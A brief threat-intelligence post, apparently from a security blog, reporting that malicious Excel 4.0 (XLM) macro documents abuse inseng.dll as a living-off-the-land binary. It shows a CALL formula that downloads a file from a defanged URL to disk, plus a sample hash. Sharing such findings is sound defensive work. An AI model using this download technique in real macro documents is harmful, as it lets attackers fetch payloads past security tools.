Written by 妖怪June 4, 2020 New #LOLBIN used in malicious #XLM documents #inseng.dll #DownloadFile =CALL(“INSENG”,”DownloadFile”,”BCCJ”,”http[s://google.com”,”D:\test\google.html”,1) c45ed3a0ce5df27ac29e0fab99dc4d462f61a0d0c025e9161ced3b2c913d57d8 @bohops @Oddvarmoe @JohnLaTwC https://t.co/Ngz1M5gnYF Share this: Share on X (Opens in new window) X Share on Facebook (Opens in new window) Facebook Like this:Like Loading...